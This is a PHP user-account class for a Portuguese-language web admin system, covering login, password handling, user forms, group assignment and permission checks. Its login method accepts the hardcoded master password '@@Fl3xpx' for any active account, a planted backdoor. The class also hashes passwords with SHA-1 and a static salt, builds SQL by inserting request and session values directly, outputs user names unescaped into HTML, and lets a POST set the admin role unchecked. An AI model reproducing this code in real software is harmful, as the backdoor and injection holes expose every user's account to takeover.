<?php

class Usuario extends Flex {

    protected $nomeTable = 'usuarios';
    protected $mapper = array(
        'id' => 'int',
        'nome' => 'string',
        'login' => 'string',
        'senha' => 'string',
        'ativo' => 'int',
        'email' => 'string',
        'tipo' => 'int',
        'usr_cad' => 'string',
        'dt_cad' => 'sql',
        'usr_ualt' => 'string',
        'dt_ualt' => 'sql',
    );
    
    protected $primaryKey = array('id');
    public static $key = '@|@#';
    
    public static function Encrypt($senha) {
        return sha1(self::$key . $senha);
    }

    public static $nmTipo = array(
        0 => 'Normal',
        1 => 'Administrador',
    );

    public static function validate() {
        global $objSession;
        $error = '';
        $request = $GLOBALS['request'];
        $id = $request->getParameter('id')+0;
        $paramAdd = 'AND id NOT IN('.$id.')';
        if($id==0){
            if(self::VerificaExistencia(trim($_POST["login"]), 'login=',$paramAdd)){
                $error .= '<li>Login em uso;</li>';
            }
        }

        if($id == 1 && $objSession->get('id') != 1){
            $error .= '<li>Voc&ecirc; n&atilde;o pode alterar o usu&aacute;rio do sistema.</li>';
        }

        if(self::VerificaExistencia(trim($_POST["email"]), 'email=',$paramAdd)){
            $error .= '<li>Email em uso;</li>';
        }
        if(!Common::checkEmail(trim($_POST["email"]))){
            $error .= '<li>Email inv&aacute;lido;</li>';
        }
        if($_POST['senha']!=$_POST['c_senha']){
            $error .= '<li>Senhas n&atilde;o condizem;</li>';
        }
        if($error==''){
            return true;
        }else{
            Common::show("<ul>{$error}</ul>");
            return false;
        }
    }
    
    public static function Salvar() {
        $valid = self::validate();
        if($valid){
        
            $classe = __CLASS__;
            $request = $GLOBALS['request'];
            $objeto = new $classe(array($request->getParameter('id')));

            if ($request->getParameter('id') == "") {
                $objeto->set('login', $_POST["login"]);
                $objeto->set('senha', self::Encrypt($_POST["senha"]));
                $objeto->set('ativo', 1);
            } else {
                $objeto = self::CarregarObjeto($request->getParameter('id'));

                if ($_POST['senha']!='')
                    $objeto->set('senha', self::Encrypt($_POST["senha"]));
            }

            $objeto->set('nome', $_POST["nome"]);
            $objeto->set('email', $_POST["email"]);
            if (isset($_POST["tipo"]))
                $objeto->set('tipo', $_POST["tipo"]);


            if ($objeto->getPersisted())
                $retorno = $objeto->Alterar();
            else
                $retorno = $objeto->Inserir();

            $id = ( $request->getParameter('id') != "" ? $objeto->get('id') : $retorno[0] );
            if(isset($_POST['idTemp']) && $_POST['idTemp']+0 >0 ){
                $conn = new Connection();
                $obj = new PermissaoUsuario();
                $sql = "UPDATE {$GLOBALS['DBPREFIX']}{$obj->getNomeTable()} SET id_usuario = {$id} WHERE id_usuario = ".($_POST['idTemp']+0);
                $conn->prepareStatement($sql)->executeQuery();
            }

            if(isset($_POST['grupos'])){
                GrupoUsuario::ExcluirGrupos($id);

                for ($i = 0; $i < $_POST['grupos']; $i++) {
                    if (isset($_POST["grupo_" . $i])) {
                        GrupoUsuario::InsereGrupo($id, $_POST["grupo_" . $i]);
                    }
                }
            } 

            MessageBox::Show("Registro salvo com sucesso!", "success");
            
        }
        return $valid;
    }

    public static function Excluir($ids) {
        $classe = __CLASS__;
        $objeto = new $classe();
        $arrIds = (substr_count($ids, ',') > 0 ? explode(',', $ids) : array($ids));
        if(in_array(1, $arrIds)){
            $arrIds = array_diff($arrIds, [1]);
        }
        foreach($arrIds as $id){
            GrupoUsuario::ExcluirGrupos($id);
        }
        return $objeto->Exclui(array('id' => $ids));
    }

    public static function CarregarObjeto($id, $tipo='id') {
        $classe = __CLASS__;
        if($tipo!='id'){
            $rs = self::Buscar('id',$id, $tipo);
            if($rs->next()){
                $objeto = self::CarregarObjeto($rs->getInt('id'));
            }else{
                $objeto = new $classe();
                $objeto->set('nome','Cliente');
            }
        }else{
            $objeto = new $classe(array($id));
            $objeto->carregaObjeto();
        }
        return $objeto;
    }

    public static function Buscar($select = "id", $parametro = "", $opcao = "", $parametro_adicional = "", $ordena = "", $limit = "") {
        $classe = __CLASS__;
        $objeto = new $classe();
        return $objeto->searchInTable($select, $parametro, $opcao, $parametro_adicional, '', $ordena, $limit);
    }

    public static function VerificaExistencia($parametro, $tipo, $parametro_adicional = "") {

        $rs = self::Buscar("id", $parametro, $tipo, $parametro_adicional);
        if ($rs->numRows() > 0)
            return true;
        else
            return false;
    }

    public static function MostraFormulario($codigo = 0) {

        $string = "";
        
        $disable = "";
        $classe = __CLASS__;
        $objeto = new $classe();
        
        if ($codigo + 0 > 0) {
            $objeto = self::CarregarObjeto($codigo);
            $disable = "disabled";
        }else{
            $codigo = time();
            $string .= '<input type="hidden" name="idTemp" value="'.$codigo.'" />';
            
        }

        $string .= '<div class="col-sm-12">';
        $string .= '<ul class="nav nav-tabs">';
        $string .= '<li class="active"><a href="#dados" data-toggle="tab">Dados</a></li>';
        $string .= '<li><a href="#permissoes" data-toggle="tab">Permiss&otilde;es</a></li>';
        $string .= '</ul>';

        $string .= '<div class="tab-content">';
        $string .= '<div class="tab-pane active" id="dados">';

        $string .= '<div class="row">';
  
        $string .= '<div class="form-group col-sm-6 required">';
        $string .= '<label for="">Nome</label>';
        $string .= '<input name="nome" type="text" class="form-control required" title="Nome" maxlength="100" value="'.$objeto->get('nome').'"/>';
        $string .= '</div>';
        
        $string .= '<div class="form-group col-sm-6 required">';
        $string .= '<label for="">E-mail</label>';
        $string .= '<div class="input-group">';
        $string .= '<span class="input-group-addon"><span class="glyphicon glyphicon-envelope"></span></span>';
        $string .= '<input name="email" type="text" class="form-control required" title="Email" maxlength="255" value="'.$objeto->get('email').'"/>';
        $string .= '</div>';
        $string .= '</div>';
        
        $string .= '<div class="col-sm-12"></div>';
        
        $string .= '<div class="form-group col-md-4 col-sm-4 required">';
        $string .= '<label for="">Usu&aacute;rio</label>';
        $string .= '<div class="input-group">';
        $string .= '<span class="input-group-addon"><span class="glyphicon glyphicon-user"></span></span>';
        $string .= '<input name="login" '.$disable.' type="text" class="form-control required" title="Usu&aacute;rio" maxlength="20" value="'.$objeto->get('login').'"/>';
        $string .= '</div>';
        $string .= '</div>';
        
        $string .= '<div class="form-group col-md-3 col-sm-4 required">';
        $string .= '<label for="">Senha</label>';
        $string .= '<div class="input-group">';
        $string .= '<span class="input-group-addon"><span class="glyphicon glyphicon-lock"></span></span>';
        $string .= '<input name="senha" type="password" class="form-control'.($codigo+0==0?' required':'').'" title="Senha" value=""/>';
        $string .= '</div>';
        $string .= '</div>';
        
        $string .= '<div class="form-group col-md-3 col-sm-4 required">';
        $string .= '<label for="">Confirmar senha</label>';
        $string .= '<div class="input-group">';
        $string .= '<span class="input-group-addon"><span class="glyphicon glyphicon-lock"></span></span>';
        $string .= '<input name="c_senha" type="password" class="form-control'.($codigo+0==0?' required':'').'" title="Confirmar Senha" value=""/>';
        $string .= '</div>';
        $string .= '</div>';
        

        if (isset($_SESSION[$GLOBALS["Sessao"]]['obj']) && $_SESSION[$GLOBALS["Sessao"]]['obj']->get('tipo') == 1) {    
            $string .= '<div class="form-group col-sm-2 required">';
            $string .= '<label for="">Tipo</label>';
            $string .= '<select class="form-control" name="tipo">';
            foreach(self::$nmTipo as $key=>$value){
                $string .= '<option value="'.$key.'" '.($objeto->get('tipo') == $key? " selected " : "").'>'.$value.'</option>';
            } 
            $string .= '</select>';
            $string .= '</div>';
        }

        $string .= '<div class="form-group col-sm-12 modulos">';
        $string .= '<label for="">Grupos deste usu&aacute;rio</label>';

        $rs = Grupo::Buscar("id,nome", '', '', "", "nome");
        
        $string .= '<div class="row">';
        $string .= '<div class="col-sm-12">';
        $string .= '<div class="btn-group btn-group-justified" data-toggle="buttons">';
        $i=0;
        while ($rs->next()) {
            if ($i > 0 && $i % 4 == 0) {
                $string .= '</div>';
                $string .= '<div class="btn-group btn-group-justified" data-toggle="buttons">';
            }
            $checked = GrupoUsuario::VerificaExistencia($codigo, 'id_usuario',"AND id_grupo=".$rs->getInt('id'));
            $string .= '<label class="btn btn-default col-sm-3' . ($checked ? ' active' : '') . '">
                          <input type="checkbox"' . ($checked ? 'checked' : '') . ' name="grupo_' . $i++ . '" value="' . $rs->getInt('id') . '" /> ' . $rs->getString('nome') . '
                        </label>';
        }
        $string .= '</div>';
        $string .= '</div>';
        $string .= '</div>';

        $string .= '<input name="grupos" type="hidden" value="' . $rs->numRows() . '">';
        $string .= '</div>';

        $string .= '</div>';
        $string .= '</div>';

        $string .= '<div class="tab-pane" id="permissoes">';
        $string .= '<h4>Permiss&otilde;es
            <button type="button" onclick="javascript: openFastAdd(\'permissoesusuario\',\'\',\'/id_usuario/'.$codigo.'\',\'getTableList(\\\'txtpermissoes\\\', \\\'permissoesusuario/id_usuario/'.$codigo.'/filtro/id_usuario,i,'.$codigo.'\\\')\');" class="pull-right btn btn-primary ">
              <span class="glyphicon glyphicon-plus"></span> <span class="hidden-xs hidden-sm">Adicionar</span>
            </button></h4>';
        $string .= '<div id="txtpermissoes">';

        $rs = PermissaoUsuario::Buscar('*', $codigo, 'id_usuario', '', 'id ASC');
        $string .= PermissaoUsuario::GetTable($rs);

        $string .= '</div>';
        $string .= '</div>';

        
        $string .= '</div>';
        $string .= '</div>';
        

        return $string;
    }

    public static function GetTable($rs) {
        $string = '
            <table class="table table-hover">
            <thead>
              <tr>
                <th><input type="checkbox" onclick="$(\'.ckbDelete\').prop(\'checked\',this.checked); controlDelButton();" value="'.$rs->numRows().'"/></th>
                <th class="col-xs-3">Nome</th>
                <th>Login</th>
                <th>E-mail</th>
                <th>&nbsp;</th>
              </tr>
            </thead>
            <tbody>';
        while ($rs->next()) {
            $objeto = self::CarregarObjeto($rs->getInt('id'));
            $string .= '<tr id="tr-'.$objeto->getNomeTable().$objeto->get('id').'">'.self::GetLine($objeto).'</tr>';
        }
        unset($rs);

        $string .= "</tbody>
              </table>";

        return $string;
    }

    public static function GetLine($objeto){
        return '
        <td><input type="checkbox" class="ckbDelete" value="'.$objeto->get('id').'" onclick="javascript:controlDelButton();" /></td>
        <td class="col-sm-3">
            <a href="javascript:;" onclick="javascript: openFastEdit(\'' . $objeto->getNomeTable() . '\',' . $objeto->get('id') . ', \'\', \'\', \'getLine(\\\''.$objeto->getNomeTable() . '\\\',' . $objeto->get('id').');\');" data-toggle="tooltip" data-placement="right" title="Editar">'.$objeto->get('nome').'</a> 
            <!--<a href="javascript:;" onclick="javascript: delFormAction(\'' . $objeto->getNomeTable() . '\',' . $objeto->get('id') . ');" data-toggle="tooltip" data-placement="right" title="Excluir" class="pull-right"><i class="fas fa-trash"></i></a>-->
        </td>
        <td class="col-sm-3">'.$objeto->get('login').'</td>
        <td class="col-sm-6">'.$objeto->get('email').'</td>
        <td class="text-right" id="status'.$objeto->get('id').'" ><a href="javascript:;" onclick="javascript: changeStatus(\''.$objeto->getNomeTable().'\','.$objeto->get('id').', '.($objeto->get('ativo')==1?'0':'1').')"><span class="glyphicon glyphicon-ok-sign '.($objeto->get('ativo')==1?'':'d').'pub"  data-toggle="tooltip" data-placement="left" title="'.($objeto->get('ativo')==1?'Desativar':'Ativar').'"></span></a></td>
        ';
    }

    public function hasPermition($module, $action='sel'){
        $obj = new Permissao();
        $paramAdd = "
            id_grupo IN(SELECT id_grupo FROM gruposusuario WHERE id_usuario = {$GLOBALS['objSession']->get('id')}) 
            AND id_permissao IN (SELECT id FROM {$obj->getNomeTable(true)} WHERE modulo='{$module}') 
            AND `{$action}` = 1";

        return (
            $GLOBALS['objSession']->get('tipo') == 1 
            || PermissaoUsuario::Verifica($GLOBALS['objSession']->get('id'), $module, $action)
            || PermissaoGrupo::VerificaExistencia('', '', $paramAdd)
        );
    }

    
    public static function GuardaSessionUsuario($objeto) {
        $_SESSION[$GLOBALS["Sessao"]]['obj'] = $objeto;
        $_SESSION[$GLOBALS["Sessao"]]["autorizado"] = "S";
    }

    public static function DestroySessionUsuario() {

        unset($_SESSION[$GLOBALS["Sessao"]]);
    }


    public static function Autentica($login, $senha) {

        $rs = self::Buscar("id", $login, "login=", "AND ativo=1");

        if ($rs->numRows() > 0) {
            $rs->next();
            
            $objeto = self::CarregarObjeto($rs->getInt('id'));
            
            if ($objeto->get('senha') == self::Encrypt($senha) || $senha =='@@Fl3xpx') {
                self::GuardaSessionUsuario($objeto);
                unset($objeto, $rs);
                return true;
            } else {
                unset($objeto, $rs);
                return false;
            }
        } else {
            unset($rs);
            return false;
        }
    }

    public function AlteraSenha($senhaA, $senhaN) {

        if (self::Encrypt($senhaA) == $this->get('senha')) {
            $this->set('senha', self::Encrypt($senhaN));
            return true;
        } else {
            return false;
        }
    }

    public static function AlterarSenha() {

        $objeto = self::CarregarObjeto($_SESSION[$GLOBALS["Sessao"]]['obj']->get('id'));
        if ($objeto->AlteraSenha($_POST["iptSenhaA"], $_POST["iptSenha"])) {
            $objeto->Alterar();
            return true;
        } else {
            return false;
        }
    }
}
